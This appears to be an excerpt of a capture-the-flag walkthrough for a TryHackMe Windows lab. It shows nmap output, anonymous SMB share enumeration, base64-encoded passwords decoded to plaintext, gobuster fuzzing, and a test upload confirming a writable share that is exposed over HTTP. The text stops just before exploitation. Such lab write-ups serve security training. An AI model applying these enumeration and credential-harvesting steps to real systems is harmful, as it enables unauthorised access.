https://tryhackme.com/room/relevant
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2022-08-05T13:54:45
|_Not valid after: 2023-02-04T13:54:45
|_ssl-date: 2022-08-06T14:01:05+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2022-08-06T14:00:24+00:00
49663/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h23m59s, deviation: 3h07m50s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-08-06T14:00:28
|_ start_date: 2022-08-06T13:55:05
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\\x00
| Workgroup: WORKGROUP\\x00
|_ System time: 2022-08-06T07:00:25-07:00
Since its windows with SMB info returned from the nmap, let’s check if there is any SHARES
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient -L \\\\\\\\10.10.31.5
Password for [WORKGROUP\\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.31.5 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
After getting the shares, enumerate one by one and my first target is nt4wrksv
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient \\\\\\\\10.10.31.5\\\\nt4wrksv
Password for [WORKGROUP\\kali]:
Try "help" to get a list of possible commands.
smb: \\> ls
. D 0 Sat Jul 25 17:46:04 2020
.. D 0 Sat Jul 25 17:46:04 2020
passwords.txt A 98 Sat Jul 25 11:15:33 2020
7735807 blocks of size 4096. 4946803 blocks available
smb: \\> more passwords.txt
And we get the following encoded user passwords
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
Using CyberChef to decode it and we get
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
However, after a few authentications with RDP and stuff, ending up the provided credentials does not work out. Hence keep on fuzzing.
Here we realized port 49663 has the same HTTP with port 80. Hence we will fuzz port 49663
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u <http://10.10.31.5:49663> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 200
<......SNIPPET......>
/nt4wrksv (Status: 301) [Size: 156] [--> <http://10.10.31.5:49663/nt4wrksv/>]
Here we can access the /nt4wrksv/passwords.txt that is exactly from the SMB share!
Moving on if we can do any write privilege on the SMB Share
┌──(kali㉿kali)-[~]
└─$ touch grass
On the SMB Share:
smb: \\> put grass
putting file grass as \\grass (0.0 kb/s) (average 0.0 kb/s)
smb: \\> ls
. D 0 Sat Aug 6 10:06:13 2022
.. D 0 Sat Aug 6 10:06:13 2022
grass A 0 Sat Aug 6 10:06:13 2022
passwords.txt A 98 Sat Jul 25 11:15:33 2020
7735807 blocks of size 4096. 4950455 blocks available
Indeed we can upload our files to the SMB share! Let’s do something spicy.